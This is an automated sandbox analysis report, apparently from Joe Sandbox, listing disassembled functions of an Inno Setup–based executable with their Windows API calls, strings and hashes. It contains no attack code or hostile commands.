                                                                                • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                                • API String ID: 2323315520-3614243559
                                                                                • Opcode ID: 7561659b3b600d63638f3944902fd7923d8484a487a3f9680a3db5d0744bedbe
                                                                                • Instruction ID: d5058fc073e0ad59750b6b6eed82d26134d8568d962b0a84cfd108907e917b52
                                                                                • Opcode Fuzzy Hash: 7561659b3b600d63638f3944902fd7923d8484a487a3f9680a3db5d0744bedbe
                                                                                • Instruction Fuzzy Hash: 8D310DB2640700EBEB01EBB9AC86A663294F728724745093FB508DB192D77C5C49CB1C
                                                                                Function 0045892C Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 186pipeprocessfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00458993
                                                                                • QueryPerformanceCounter.KERNEL32(02153858,00000000,00458C26,?,?,02153858,00000000,?,00459322,?,02153858,00000000), ref: 0045899C
                                                                                • GetSystemTimeAsFileTime.KERNEL32(02153858,02153858), ref: 004589A6
                                                                                • GetCurrentProcessId.KERNEL32(?,02153858,00000000,00458C26,?,?,02153858,00000000,?,00459322,?,02153858,00000000), ref: 004589AF
                                                                                • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00458A25
                                                                                • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02153858,02153858), ref: 00458A33
                                                                                • CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,00458BE2), ref: 00458A7B
                                                                                • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,00458BD1,?,00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,00458BE2), ref: 00458AB4
                                                                                  • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                                • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458B5D
                                                                                • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 00458B93
                                                                                • CloseHandle.KERNEL32(000000FF,00458BD8,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458BCB
                                                                                  • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                                • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                                • API String ID: 770386003-3271284199
                                                                                • Opcode ID: b3cb95de96f0a494fe77a0225261b47a74f516519aada3d90b4a318c7d3773ef
                                                                                • Instruction ID: 46381a2ef6f5f7687f8d932114089cfc0a3b3023078b53c1614b04e084b280c9
                                                                                • Opcode Fuzzy Hash: b3cb95de96f0a494fe77a0225261b47a74f516519aada3d90b4a318c7d3773ef
                                                                                • Instruction Fuzzy Hash: 02711370A04348AEDB11DB69CC41B5EBBF8EB15705F1084BAB944FB282DB7859488B69
                                                                                Function 00478420 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 94COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0047828C: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02152BE0,?,?,?,02152BE0,00478450,00000000,0047856E,?,?,-00000010,?), ref: 004782A5
                                                                                  • Part of subcall function 0047828C: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004782AB
                                                                                  • Part of subcall function 0047828C: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02152BE0,?,?,?,02152BE0,00478450,00000000,0047856E,?,?,-00000010,?), ref: 004782BE
                                                                                  • Part of subcall function 0047828C: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02152BE0,?,?,?,02152BE0), ref: 004782E8
                                                                                  • Part of subcall function 0047828C: CloseHandle.KERNEL32(00000000,?,?,?,02152BE0,00478450,00000000,0047856E,?,?,-00000010,?), ref: 00478306
                                                                                  • Part of subcall function 00478364: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,004783F6,?,?,?,02152BE0,?,00478458,00000000,0047856E,?,?,-00000010,?), ref: 00478394
                                                                                • ShellExecuteEx.SHELL32(0000003C), ref: 004784A8
                                                                                • GetLastError.KERNEL32(00000000,0047856E,?,?,-00000010,?), ref: 004784B1
                                                                                • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004784FE
                                                                                • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00478522
                                                                                • CloseHandle.KERNEL32(00000000,00478553,00000000,00000000,000000FF,000000FF,00000000,0047854C,?,00000000,0047856E,?,?,-00000010,?), ref: 00478546
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                                                • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                • API String ID: 883996979-221126205
                                                                                • Opcode ID: 7bc79704bed3dd733a1086ace77ac7314c1c869dae30f57a13a5b111f7ab0a8e
                                                                                • Instruction ID: be90243bdd9c3757315ff9bbcfcad83cd6a8df60a98d136a70e83fac94f3d3e4
                                                                                • Opcode Fuzzy Hash: 7bc79704bed3dd733a1086ace77ac7314c1c869dae30f57a13a5b111f7ab0a8e
                                                                                • Instruction Fuzzy Hash: E0314670A40609BEDB11EFAAD845ADEB6B8EF05314F50847FF518E7281DB7C89058B19
                                                                                Function 0042286C Relevance: 18.3, APIs: 12, Instructions: 255windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 00422A04
                                                                                • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BCE), ref: 00422A14
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSendShowWindow
                                                                                • String ID:
                                                                                • API String ID: 1631623395-0
                                                                                • Opcode ID: ba2239a6b7e39db5a6c256e0bd052b844ec1d952261cb85ab3a20d26880a6eee
                                                                                • Instruction ID: ac1ceeab966790095f9612ce7a7db5e594191b89627cdcc61fab65d1acc55ab9
                                                                                • Opcode Fuzzy Hash: ba2239a6b7e39db5a6c256e0bd052b844ec1d952261cb85ab3a20d26880a6eee
                                                                                • Instruction Fuzzy Hash: 79914071B04214BFD711EFA9DA86F9D77F4AB04314F5500BAF504AB3A2CB78AE409B58
                                                                                Function 00418394 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 58windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsIconic.USER32(?), ref: 004183A3
                                                                                • GetWindowPlacement.USER32(?,0000002C), ref: 004183C0
                                                                                • GetWindowRect.USER32(?), ref: 004183DC
                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 004183EA
                                                                                • GetWindowLongA.USER32(?,000000F8), ref: 004183FF
                                                                                • ScreenToClient.USER32(00000000), ref: 00418408
                                                                                • ScreenToClient.USER32(00000000,?), ref: 00418413
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                • String ID: ,
                                                                                • API String ID: 2266315723-3772416878
                                                                                • Opcode ID: 6217f91ca86bc21168c1a31dc77beadf87db026dacfe8a4e2043101b83599555
                                                                                • Instruction ID: f1655e9c1aaa1f9d3e17845697c0dfec8ab0781743990dff6cd0a114faef5a7c
                                                                                • Opcode Fuzzy Hash: 6217f91ca86bc21168c1a31dc77beadf87db026dacfe8a4e2043101b83599555
                                                                                • Instruction Fuzzy Hash: D6112B71505201AFDB00EF69C885F9B77E8AF49314F18067EBD58DB286D738D900CBA9
                                                                                Function 004555D0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41shutdownCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00000028), ref: 004555DF
                                                                                • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555E5
                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 004555FE
                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455625
                                                                                • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045562A
                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 0045563B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                • String ID: SeShutdownPrivilege
                                                                                • API String ID: 107509674-3733053543
                                                                                • Opcode ID: 905e5c4f0c040865ada5a790a5680192090f128290145b13f19b3701cccf3d3d
                                                                                • Instruction ID: f0f78ca649e8ddc1473c2e21848b41e7847a09c75f53dffa28e6f5675cd8c776
                                                                                • Opcode Fuzzy Hash: 905e5c4f0c040865ada5a790a5680192090f128290145b13f19b3701cccf3d3d
                                                                                • Instruction Fuzzy Hash: 32F0F670284B42B9E610AA758C13F3B21C89B40B49F80083EBD09EA1C3D7BDC80C4A2F
                                                                                Function 0045D4EC Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 34libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045D4F5
                                                                                • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045D505
                                                                                • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045D515
                                                                                • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047F47B,00000000,0047F4A4), ref: 0045D53A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$CryptVersion
                                                                                • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                                • API String ID: 1951258720-508647305
                                                                                • Opcode ID: 6323a5a980eb8feb456ca02504bfb6ad995229d531f09a6584140c28355fd360
                                                                                • Instruction ID: 2c2546d05897d0e560449e180de6b9da44e6f0241588afb6de3da162f6531889
                                                                                • Opcode Fuzzy Hash: 6323a5a980eb8feb456ca02504bfb6ad995229d531f09a6584140c28355fd360
                                                                                • Instruction Fuzzy Hash: 3AF012F0940704EBEB18DFB6BCC67623695ABD531AF14C137A404A51A2E778044CCE1D
                                                                                Function 00497A74 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,00497BB2,?,?,00000000,0049B628,?,00497D3C,00000000,00497D90,?,?,00000000,0049B628), ref: 00497ACB
                                                                                • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 00497B4E
                                                                                • FindNextFileA.KERNEL32(000000FF,?,00000000,00497B8A,?,00000000,?,00000000,00497BB2,?,?,00000000,0049B628,?,00497D3C,00000000), ref: 00497B66
                                                                                • FindClose.KERNEL32(000000FF,00497B91,00497B8A,?,00000000,?,00000000,00497BB2,?,?,00000000,0049B628,?,00497D3C,00000000,00497D90), ref: 00497B84
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: FileFind$AttributesCloseFirstNext
                                                                                • String ID: isRS-$isRS-???.tmp
                                                                                • API String ID: 134685335-3422211394
                                                                                • Opcode ID: ba647548f34564e7f56f6c808fa7faec3af05a969934c2433d5159a38f0bbcda
                                                                                • Instruction ID: b2847bb1a44685988a55541ee7ac685ebeb66ffb5e30493f66813578f7a68db2
                                                                                • Opcode Fuzzy Hash: ba647548f34564e7f56f6c808fa7faec3af05a969934c2433d5159a38f0bbcda
                                                                                • Instruction Fuzzy Hash: A63165719146186FCF10EF65CC41ADEBBBCDB45318F5084F7A808A32A1E638AE458F58
                                                                                Function 004573CC Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 238windownativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457449
                                                                                • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457470
                                                                                • SetForegroundWindow.USER32(?), ref: 00457481
                                                                                • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,0045775B,?,00000000,00457797), ref: 00457746
                                                                                Strings
                                                                                • Cannot evaluate variable because [Code] isn't running yet, xrefs: 004575C6
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                                • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                                • API String ID: 2236967946-3182603685
                                                                                • Opcode ID: fe95ac23089f8abddac86e3d9ae11b4981b9e88786854755ce7e63a50dbcddc8
                                                                                • Instruction ID: 5bc10c0d354cae83c82450a0913647aad13fd3ad71d4eb48676ad76960377df7
                                                                                • Opcode Fuzzy Hash: fe95ac23089f8abddac86e3d9ae11b4981b9e88786854755ce7e63a50dbcddc8
                                                                                • Instruction Fuzzy Hash: D9910034608204EFD715CF54E991F5ABBF9EB89305F2180BAED0897792D638AE04DF58
                                                                                Function 00455DF8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 112libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F37), ref: 00455E28
                                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E2E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                • API String ID: 1646373207-3712701948
                                                                                • Opcode ID: b5f149e20a31f3d313834126475bcf244ddb8ed42aa7b007c000aa6233a22d25
                                                                                • Instruction ID: 12dfdd1b414f9b5fa57bb507e68127e36b1c1a940f154b23c6ee37fdedd7ee09
                                                                                • Opcode Fuzzy Hash: b5f149e20a31f3d313834126475bcf244ddb8ed42aa7b007c000aa6233a22d25
                                                                                • Instruction Fuzzy Hash: 66415171A04649AFCF01EFA5C8929EFB7B8EF49304F508566F800F7252D6785E09CB69
                                                                                Function 00417CE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsIconic.USER32(?), ref: 00417D1F
                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
                                                                                • GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
                                                                                • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Placement$Iconic
                                                                                • String ID: ,
                                                                                • API String ID: 568898626-3772416878
                                                                                • Opcode ID: 419626ddcb93f619c016e5eb608395eb97e33a9638738bd346f5ce49c9230b00
                                                                                • Instruction ID: 117db6d3727d0f94901dea8748b8d47281c3d2add8a8e77c7f929e434730b1f7
                                                                                • Opcode Fuzzy Hash: 419626ddcb93f619c016e5eb608395eb97e33a9638738bd346f5ce49c9230b00
                                                                                • Instruction Fuzzy Hash: 41213171604208ABCF40EF69E8C0EEA77B8AF49314F05456AFD18DF246C678DD84CB68
                                                                                Function 00464048 Relevance: 7.6, APIs: 5, Instructions: 129fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001,00000000,00464205), ref: 00464079
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,004641D8,?,00000001,00000000,00464205), ref: 00464108
                                                                                • FindNextFileA.KERNEL32(000000FF,?,00000000,004641BA,?,00000000,?,00000000,004641D8,?,00000001,00000000,00464205), ref: 0046419A
                                                                                • FindClose.KERNEL32(000000FF,004641C1,004641BA,?,00000000,?,00000000,004641D8,?,00000001,00000000,00464205), ref: 004641B4
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File$CloseErrorFirstModeNext
                                                                                • String ID:
                                                                                • API String ID: 4011626565-0
                                                                                • Opcode ID: ae980c7907389dfafffe65f94222ffd443bde6570b10391f97ae33023227fa5d
                                                                                • Instruction ID: 2652c2d8e8669354d55d474f1d59e7b06630ff05c6329d0403030a32038cf055
                                                                                • Opcode Fuzzy Hash: ae980c7907389dfafffe65f94222ffd443bde6570b10391f97ae33023227fa5d
                                                                                • Instruction Fuzzy Hash: 1E418770A00618AFCF10EF65DC55ADEB7B8EB89705F5044BAF804E7381E67C9E848E59
                                                                                Function 004644C4 Relevance: 7.6, APIs: 5, Instructions: 129fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001,00000000,004646AB), ref: 00464539
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,00464676,?,00000001,00000000,004646AB), ref: 0046457F
                                                                                • FindNextFileA.KERNEL32(000000FF,?,00000000,00464658,?,00000000,?,00000000,00464676,?,00000001,00000000,004646AB), ref: 00464634
                                                                                • FindClose.KERNEL32(000000FF,0046465F,00464658,?,00000000,?,00000000,00464676,?,00000001,00000000,004646AB), ref: 00464652
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File$CloseErrorFirstModeNext
                                                                                • String ID:
                                                                                • API String ID: 4011626565-0
                                                                                • Opcode ID: 8a1b155a3f91a4aa9fbf35308e738363c59e35d7d54ec670dc4b6b29b87b573a
                                                                                • Instruction ID: 7635123f594c8b6db569002a9bb01bf8fa96c74c2cf80da52efac59b167f1e7c
                                                                                • Opcode Fuzzy Hash: 8a1b155a3f91a4aa9fbf35308e738363c59e35d7d54ec670dc4b6b29b87b573a
                                                                                • Instruction Fuzzy Hash: D8416171A00A18EBCB10EFA5CC959DEB7B9EB88305F4044AAF804A7351E77C9E448E59
                                                                                Function 0042E944 Relevance: 7.6, APIs: 5, Instructions: 50fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F2B,00000000,00452F4C), ref: 0042E966
                                                                                • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E991
                                                                                • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F2B,00000000,00452F4C), ref: 0042E99E
                                                                                • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F2B,00000000,00452F4C), ref: 0042E9A6
